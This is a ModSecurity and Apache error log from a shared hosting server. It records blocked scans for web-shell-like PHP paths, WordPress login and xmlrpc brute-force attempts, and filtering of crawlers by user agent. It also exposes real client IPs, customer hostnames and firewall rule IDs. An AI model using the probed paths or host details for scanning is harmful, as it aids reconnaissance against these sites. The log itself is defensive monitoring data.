[Tue May 26 14:23:59.797181 2026] [security2:error] [pid 610693:tid 610923] [client 20.116.59.164:11230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahVfpzvNO3hpmlY6M8RW_QAAAGQ"]
[Tue May 26 14:23:59.797278 2026] [security2:error] [pid 610693:tid 610923] [client 20.116.59.164:11230] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahVfpzvNO3hpmlY6M8RW_QAAAGQ"]
[Tue May 26 14:23:59.859503 2026] [security2:error] [pid 610693:tid 610878] [client 124.248.183.57:65184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.183.248.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php/wp-login.php"] [unique_id "ahVfpzvNO3hpmlY6M8RW_wAAADc"]
[Tue May 26 14:24:00.974112 2026] [security2:error] [pid 610693:tid 610888] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfqDvNO3hpmlY6M8RXEwAAAEE"]
[Tue May 26 14:24:00.991056 2026] [security2:error] [pid 606909:tid 607115] [client 123.18.84.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfqF0yRtX9qA7aVUVgdAAAANE"]
[Tue May 26 14:24:01.140389 2026] [security2:error] [pid 606909:tid 606997] [remote 135.181.183.122:36394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.183.181.135.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVfqF0yRtX9qA7aVUVgewAA1lc"]
[Tue May 26 14:24:01.363826 2026] [security2:error] [pid 610693:tid 610767] [remote 54.38.29.86:50196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVfqTvNO3hpmlY6M8RXJQAAYEk"]
[Tue May 26 14:24:01.971784 2026] [security2:error] [pid 610693:tid 610872] [client 20.116.59.164:11237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVfqTvNO3hpmlY6M8RXOQAAADE"]
[Tue May 26 14:24:01.971912 2026] [security2:error] [pid 610693:tid 610872] [client 20.116.59.164:11237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVfqTvNO3hpmlY6M8RXOQAAADE"]
[Tue May 26 14:24:01.993787 2026] [security2:error] [pid 606909:tid 607153] [client 47.128.52.156:53336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/robots.txt"] [unique_id "ahVfqV0yRtX9qA7aVUVghQAAAPc"]
[Tue May 26 14:24:02.254091 2026] [security2:error] [pid 610693:tid 610942] [client 85.208.96.206:27520] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-05-24/"] [unique_id "ahVfqjvNO3hpmlY6M8RXOwAAAHc"]
[Tue May 26 14:24:02.254265 2026] [security2:error] [pid 610693:tid 610942] [client 85.208.96.206:27520] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-05-24/"] [unique_id "ahVfqjvNO3hpmlY6M8RXOwAAAHc"]
[Tue May 26 14:24:02.594015 2026] [security2:error] [pid 610693:tid 610771] [remote 58.251.94.5:35344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.94.251.58.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVfqjvNO3hpmlY6M8RXPAAAY00"]
[Tue May 26 14:24:02.765142 2026] [security2:error] [pid 606909:tid 607145] [client 20.116.59.164:15317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/222.php"] [unique_id "ahVfql0yRtX9qA7aVUVgjwAAAO8"]
[Tue May 26 14:24:02.765231 2026] [security2:error] [pid 606909:tid 607145] [client 20.116.59.164:15317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/222.php"] [unique_id "ahVfql0yRtX9qA7aVUVgjwAAAO8"]
[Tue May 26 14:24:02.978615 2026] [security2:error] [pid 606909:tid 607166] [client 202.141.83.254:19723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfql0yRtX9qA7aVUVgmwAAAQQ"]
[Tue May 26 14:24:02.978762 2026] [security2:error] [pid 606909:tid 607166] [client 202.141.83.254:19723] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfql0yRtX9qA7aVUVgmwAAAQQ"]
[Tue May 26 14:24:03.008765 2026] [security2:error] [pid 606909:tid 607043] [client 4.201.75.230:5644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVfq10yRtX9qA7aVUVgnAAAAIk"]
[Tue May 26 14:24:03.077867 2026] [security2:error] [pid 606909:tid 607134] [client 67.216.237.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfq10yRtX9qA7aVUVgnwAAAOQ"], referer: https://anujtradingco.com
[Tue May 26 14:24:03.327947 2026] [security2:error] [pid 606909:tid 607129] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfql0yRtX9qA7aVUVgkgAAAN8"]
[Tue May 26 14:24:03.685588 2026] [ssl:error] [pid 610693:tid 610792] [remote 181.85.245.115:54748] AH02032: Hostname blog.jhonweb.com provided via SNI and hostname www.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://blog.jhonweb.com/
[Tue May 26 14:24:03.939052 2026] [security2:error] [pid 610693:tid 610891] [client 20.116.59.164:11245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVfqzvNO3hpmlY6M8RXWQAAAEQ"]
[Tue May 26 14:24:03.939160 2026] [security2:error] [pid 610693:tid 610891] [client 20.116.59.164:11245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVfqzvNO3hpmlY6M8RXWQAAAEQ"]
[Tue May 26 14:24:03.968220 2026] [security2:error] [pid 606909:tid 607159] [client 60.53.115.107:45680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVfql0yRtX9qA7aVUVghgAA_WE"]
[Tue May 26 14:24:04.465466 2026] [security2:error] [pid 606909:tid 607073] [client 66.146.232.206:17125] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVfq10yRtX9qA7aVUVgrAAAAKc"], referer: https://anujtradingco.com
[Tue May 26 14:24:04.743362 2026] [security2:error] [pid 606909:tid 607161] [client 20.116.59.164:15329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/chosen.php"] [unique_id "ahVfrF0yRtX9qA7aVUVgtgAAAP8"]
[Tue May 26 14:24:04.743456 2026] [security2:error] [pid 606909:tid 607161] [client 20.116.59.164:15329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/chosen.php"] [unique_id "ahVfrF0yRtX9qA7aVUVgtgAAAP8"]
[Tue May 26 14:24:04.750513 2026] [security2:error] [pid 606909:tid 607057] [client 4.201.75.230:5643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/css/autoload_classmap.php"] [unique_id "ahVfrF0yRtX9qA7aVUVgtwAAAJc"]
[Tue May 26 14:24:05.094162 2026] [security2:error] [pid 610693:tid 610856] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfrTvNO3hpmlY6M8RXcwAAACE"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 14:24:05.252916 2026] [security2:error] [pid 606909:tid 607120] [client 20.116.59.164:15307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/info.php"] [unique_id "ahVfrV0yRtX9qA7aVUVguQAAANY"]
[Tue May 26 14:24:05.253020 2026] [security2:error] [pid 606909:tid 607120] [client 20.116.59.164:15307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/info.php"] [unique_id "ahVfrV0yRtX9qA7aVUVguQAAANY"]
[Tue May 26 14:24:05.389212 2026] [security2:error] [pid 610693:tid 610918] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfrDvNO3hpmlY6M8RXcAAAAF8"]
[Tue May 26 14:24:06.367531 2026] [proxy:error] [pid 610693:tid 610851] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:24:06.367701 2026] [proxy_http:error] [pid 610693:tid 610851] [client 20.116.59.164:15249] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:24:06.368474 2026] [proxy:error] [pid 610693:tid 610851] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:24:06.368563 2026] [proxy_http:error] [pid 610693:tid 610851] [client 20.116.59.164:15249] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:24:06.368817 2026] [security2:error] [pid 610693:tid 610851] [client 20.116.59.164:15249] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVfrjvNO3hpmlY6M8RXiAAAABw"]
[Tue May 26 14:24:07.654254 2026] [security2:error] [pid 606909:tid 607141] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfr10yRtX9qA7aVUVgzwAAAOs"]
[Tue May 26 14:24:07.888697 2026] [security2:error] [pid 610693:tid 610915] [client 20.116.59.164:11258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/s.php"] [unique_id "ahVfrzvNO3hpmlY6M8RXoAAAAFw"]
[Tue May 26 14:24:07.888805 2026] [security2:error] [pid 610693:tid 610915] [client 20.116.59.164:11258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/s.php"] [unique_id "ahVfrzvNO3hpmlY6M8RXoAAAAFw"]
[Tue May 26 14:24:08.645546 2026] [security2:error] [pid 606909:tid 607131] [client 20.116.59.164:15263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVfsF0yRtX9qA7aVUVg3gAAAOE"]
[Tue May 26 14:24:08.645672 2026] [security2:error] [pid 606909:tid 607131] [client 20.116.59.164:15263] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVfsF0yRtX9qA7aVUVg3gAAAOE"]
[Tue May 26 14:24:09.584759 2026] [security2:error] [pid 610693:tid 610873] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfsTvNO3hpmlY6M8RXsQAAADI"]
[Tue May 26 14:24:09.608782 2026] [security2:error] [pid 606909:tid 606929] [remote 109.228.50.118:52362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVfsV0yRtX9qA7aVUVg6AAAmhM"]
[Tue May 26 14:24:11.451339 2026] [security2:error] [pid 606909:tid 607020] [remote 154.66.198.148:55192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVfs10yRtX9qA7aVUVg_QAAqm4"]
[Tue May 26 14:24:11.670827 2026] [security2:error] [pid 610693:tid 610935] [client 20.116.59.164:11175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVfszvNO3hpmlY6M8RX0gAAAHA"]
[Tue May 26 14:24:11.670985 2026] [security2:error] [pid 610693:tid 610935] [client 20.116.59.164:11175] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVfszvNO3hpmlY6M8RX0gAAAHA"]
[Tue May 26 14:24:11.766141 2026] [security2:error] [pid 606909:tid 607104] [client 20.116.59.164:15260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahVfs10yRtX9qA7aVUVhBgAAAMY"]
[Tue May 26 14:24:11.766230 2026] [security2:error] [pid 606909:tid 607104] [client 20.116.59.164:15260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahVfs10yRtX9qA7aVUVhBgAAAMY"]
[Tue May 26 14:24:11.936809 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfszvNO3hpmlY6M8RXzwAAACg"]
[Tue May 26 14:24:12.316243 2026] [security2:error] [pid 606909:tid 607047] [client 20.116.59.164:15309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/file.php"] [unique_id "ahVftF0yRtX9qA7aVUVhCwAAAI0"]
[Tue May 26 14:24:12.316372 2026] [security2:error] [pid 606909:tid 607047] [client 20.116.59.164:15309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/file.php"] [unique_id "ahVftF0yRtX9qA7aVUVhCwAAAI0"]
[Tue May 26 14:24:13.078618 2026] [proxy:error] [pid 610693:tid 610834] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:24:13.078695 2026] [proxy_http:error] [pid 610693:tid 610834] [client 20.116.59.164:15335] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:24:13.079261 2026] [proxy:error] [pid 610693:tid 610834] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:24:13.079291 2026] [proxy_http:error] [pid 610693:tid 610834] [client 20.116.59.164:15335] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:24:13.079394 2026] [security2:error] [pid 610693:tid 610834] [client 20.116.59.164:15335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVftTvNO3hpmlY6M8RX3AAAAAs"]
[Tue May 26 14:24:13.217707 2026] [security2:error] [pid 606909:tid 607070] [client 4.201.75.230:5646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/fx.php"] [unique_id "ahVftV0yRtX9qA7aVUVhGQAAAKQ"]
[Tue May 26 14:24:13.546124 2026] [security2:error] [pid 610693:tid 610914] [client 202.141.83.254:19880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVftTvNO3hpmlY6M8RX3wAAAFs"]
[Tue May 26 14:24:13.546257 2026] [security2:error] [pid 610693:tid 610914] [client 202.141.83.254:19880] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVftTvNO3hpmlY6M8RX3wAAAFs"]
[Tue May 26 14:24:13.857833 2026] [security2:error] [pid 610693:tid 610898] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVftTvNO3hpmlY6M8RX4AAAAEs"]
[Tue May 26 14:24:15.794659 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVft10yRtX9qA7aVUVhRwAAAP4"]
[Tue May 26 14:24:17.427200 2026] [security2:error] [pid 606909:tid 607070] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfuV0yRtX9qA7aVUVhXwAAAKQ"]
[Tue May 26 14:24:17.515880 2026] [security2:error] [pid 606909:tid 607097] [client 4.201.75.230:5633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/gelay.php"] [unique_id "ahVfuV0yRtX9qA7aVUVhagAAAL8"]
[Tue May 26 14:24:19.135539 2026] [security2:error] [pid 610693:tid 610808] [remote 91.210.171.209:45480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVfuzvNO3hpmlY6M8RYHQAAZXI"]
[Tue May 26 14:24:19.922164 2026] [security2:error] [pid 610693:tid 610886] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfuzvNO3hpmlY6M8RYJwAAAD8"]
[Tue May 26 14:24:20.278893 2026] [security2:error] [pid 606909:tid 607111] [client 74.7.230.8:57656] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahVfvF0yRtX9qA7aVUVhgQAAzTU"]
[Tue May 26 14:24:21.618987 2026] [security2:error] [pid 610693:tid 610853] [client 14.164.241.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfvTvNO3hpmlY6M8RYSgAAAB4"]
